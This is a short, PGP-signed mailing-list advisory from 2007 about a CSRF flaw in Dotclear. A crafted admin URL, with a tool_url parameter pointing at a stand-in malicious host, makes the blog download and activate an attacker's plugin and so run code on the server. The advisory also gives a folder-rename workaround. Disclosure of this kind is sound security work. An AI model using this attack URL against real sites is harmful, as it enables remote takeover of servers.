<<< Date Index >>>     <<< Thread Index >>>

Dotclear remote script execution



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

There is a French website about two vulnerabilities ; the one works on
Wordpress (27/05/2007) and the other on Dotclear (08/07/2007) :

http://ar3av.free.fr/sommaire.php


If a Dotclear blog administrator is logged in (or has a cookie for
automatic identification), you can redirect him (by an image posted in
his forum for example) to an URL such as :
http://the-dotclear-blog.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng
In this case, Dotclear will get, install and activate the plugin
http://www.malicious-website.com/malicious-file.pkg.gz
It's very easy now to execute arbitrary instructions on the remote server.

A temporary solution is to rename admin's folder ("ecrire" for Dotclear
1 or "admin" for Dotclear 2). There is no official patch at this time.

There is some other examples that allow you to add an administrator,
change the website's theme, based on the same concept.

Best regards,
Sacha
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGlRWcPiOocQNLzbYRAoFxAJsHoll3YaZPnzUv5gWlh93sNThfLgCeJDFF
GIH89HCHRTXaMSf5gbz9NIM=
=lnZU
-----END PGP SIGNATURE-----